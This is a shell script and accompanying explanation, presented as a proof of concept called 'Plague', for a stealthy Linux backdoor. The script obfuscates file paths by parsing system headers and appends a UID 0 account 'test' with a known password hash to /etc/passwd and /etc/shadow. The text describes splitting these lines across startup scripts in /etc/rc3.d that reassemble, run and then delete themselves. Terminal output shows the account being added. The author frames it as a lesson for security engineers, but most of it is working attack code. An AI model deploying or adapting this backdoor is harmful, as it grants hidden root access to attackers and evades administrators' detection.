#!/bin.sh
# Plague Proof of Concept
# J. Oquendo
# echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
# places an account called test with the
# password test on a machine
# Scripted for Linux as a Proof of Concept
# easily modified for any nix distro
# (BSD, Solaris, QNX, etc)

file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' >> $file
file2=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2

# FreeBSD

file=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' $file|sed -n '3p' >> $file

# blah blah blah ...

# file2=`awk 'NR==69 {gsub(/,/,"");print $8}' /usr/include/pwd.h`
# sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2
# Yes I know... /usr/sbin/pwd_mkdb -p /etc/master.passwd .. boohoo
# fix=`awk 'NR==79 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
# up=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
# $fix -p $up 

# Too bored to continue with the concept. If you don't get it, you don't get it.


# Solaris... You finish the rest of the work...
file=`sed -n '41p' /usr/include/newt.h |awk '{print $3}'|sed 's/Fg,//g;s/^/\/etc\//g'`
file2=`sed -n '57p' /usr/include/unistd.h|awk '{print $3}'|sed 's/"//g'`

.......................................................

Plague is an odd proof of concept backdoor keeping tool based on the premise of using existing system files and
commands to keep and maintain a backdoor on Linux systems. I could have modified this for BSD, Solaris, etc.,
but I didn't feel like doing that much work. Besides it's conceptual.


The purpose behind it was to give security engineers a glimpse of the perfect backdoor if done correctly and
how it would be difficult to detect. There are solely 4 lines in this shell script which add an account to a
system. To the untrained *Nix admin, these commands may be overlooked as they are unintrusive... They mention
nothing that stands out.

Imagine portions of this scattered throughout system scripts compiling in the end (something like Voltron)
to run either on startup or shutdown...

Sure you would see the account in password but unless you dissect your machine and are CONSTANTLY running
something like Tripwire, something like this would be a nightmare. For you Linux users using yum, apt-get,
etc., how often do you redo your checksums?

Example script called from various files the were Predefined in /etc/rc3.d/

echo "file=`awk 'NR==59 {gsub(/"/,"");print \$3}' /usr/include/paths.h`" >>  K1firstfile
echo "sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' >> $file"  >>"  >>  K2nextfile
echo "file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`" >> K3anotherfile
echo "sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/'' >> $file2" >> K4endingfile
echo "rm $file1 $file2" >> K5lastfileremove

Each line is placed in one file in executing order where at the end it is all re-compiled, run, then deleted...
awk was too long and to me a bit more obvious then sed... And yes I could have gotten the oneliner shorter had
I wanted to.

But what about the hash in /etc/shadow? Simple...

awk -F ":" 'BEGIN{OFS=":"}{$1="new_account_name"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2'
This places the account "new_account_name" with the password "test" in /etc/shadow

Here is the before and after on a Scientfic Linux machine

[root@armada ~]# uname -a
Linux armada.disgraced.org 2.6.9-34.EL #1 Mon Mar 13 11:31:17 CST 2006 i686 athlon i386 GNU/Linux
[root@armada ~]# 
[root@armada ~]# cat /etc/shadow
root://////////:13428:0:99999:7:::
bin:*:13428:0:99999:7:::
daemon:*:13428:0:99999:7:::
adm:*:13428:0:99999:7:::
lp:*:13428:0:99999:7:::
sync:*:13428:0:99999:7:::
shutdown:*:13428:0:99999:7:::
halt:*:13428:0:99999:7:::
mail:*:13428:0:99999:7:::
news:*:13428:0:99999:7:::
uucp:*:13428:0:99999:7:::
operator:*:13428:0:99999:7:::
games:*:13428:0:99999:7:::
gopher:*:13428:0:99999:7:::
ftp:*:13428:0:99999:7:::
nobody:*:13428:0:99999:7:::
dbus:!!:13428:0:99999:7:::
vcsa:!!:13428:0:99999:7:::
rpm:!!:13428:0:99999:7:::
haldaemon:!!:13428:0:99999:7:::
netdump:!!:13428:0:99999:7:::
nscd:!!:13428:0:99999:7:::
sshd:!!:13428:0:99999:7:::
rpc:!!:13428:0:99999:7:::
mailnull:!!:13428:0:99999:7:::
smmsp:!!:13428:0:99999:7:::
rpcuser:!!:13428:0:99999:7:::
nfsnobody:!!:13428:0:99999:7:::
pcap:!!:13428:0:99999:7:::
apache:!!:13428:0:99999:7:::
squid:!!:13428:0:99999:7:::
webalizer:!!:13428:0:99999:7:::
xfs:!!:13428:0:99999:7:::
ntp:!!:13428:0:99999:7:::
gdm:!!:13428:0:99999:7:::
quagga:!!:13428:0:99999:7:::
dovecot:!!:13428:0:99999:7:::
postfix:!!:13428:0:99999:7:::
mysql:!!:13428:0:99999:7:::
sil:!!:13428:0:99999:7:::
nagios:!!:13430:0:99999:7:::
luzer:!!:13437:0:99999:7:::
zenoss:!!:13438:0:99999:7:::
[root@armada ~]# 
[root@armada ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sil:x:500:500:Loser:/home/sil:/bin/bash
nagios:x:501:501::/home/nagios:/bin/bash
alanr:x:502:502::/home/alanr:/bin/bash
luzer:x:503:503::/home/luzer:/bin/bash
zenoss:x:504:504::/home/zenoss:/bin/bash
[root@armada ~]# ./plague
[root@armada ~]# 
[root@armada ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sil:x:500:500:Loser:/home/sil:/bin/bash
nagios:x:501:501::/home/nagios:/bin/bash
alanr:x:502:502::/home/alanr:/bin/bash
luzer:x:503:503::/home/luzer:/bin/bash
zenoss:x:504:504::/home/zenoss:/bin/bash
test:x:0:0:root:/root:/bin/bash
[root@armada ~]# 
[root@armada ~]# cat /etc/shadow
root://////////:13428:0:99999:7:::
bin:*:13428:0:99999:7:::
daemon:*:13428:0:99999:7:::
adm:*:13428:0:99999:7:::
lp:*:13428:0:99999:7:::
sync:*:13428:0:99999:7:::
shutdown:*:13428:0:99999:7:::
halt:*:13428:0:99999:7:::
mail:*:13428:0:99999:7:::
news:*:13428:0:99999:7:::
uucp:*:13428:0:99999:7:::
operator:*:13428:0:99999:7:::
games:*:13428:0:99999:7:::
gopher:*:13428:0:99999:7:::
ftp:*:13428:0:99999:7:::
nobody:*:13428:0:99999:7:::
dbus:!!:13428:0:99999:7:::
vcsa:!!:13428:0:99999:7:::
rpm:!!:13428:0:99999:7:::
haldaemon:!!:13428:0:99999:7:::
netdump:!!:13428:0:99999:7:::
nscd:!!:13428:0:99999:7:::
sshd:!!:13428:0:99999:7:::
rpc:!!:13428:0:99999:7:::
mailnull:!!:13428:0:99999:7:::
smmsp:!!:13428:0:99999:7:::
rpcuser:!!:13428:0:99999:7:::
nfsnobody:!!:13428:0:99999:7:::
pcap:!!:13428:0:99999:7:::
apache:!!:13428:0:99999:7:::
squid:!!:13428:0:99999:7:::
webalizer:!!:13428:0:99999:7:::
xfs:!!:13428:0:99999:7:::
ntp:!!:13428:0:99999:7:::
gdm:!!:13428:0:99999:7:::
quagga:!!:13428:0:99999:7:::
dovecot:!!:13428:0:99999:7:::
postfix:!!:13428:0:99999:7:::
mysql:!!:13428:0:99999:7:::
sil:!!:13428:0:99999:7:::
nagios:!!:13430:0:99999:7:::
luzer:!!:13437:0:99999:7:::
zenoss:!!:13438:0:99999:7:::
test:$1$N6M3yuA9$JXTgD8q8apf1fgfUT44hW1:13428:0:99999:7:::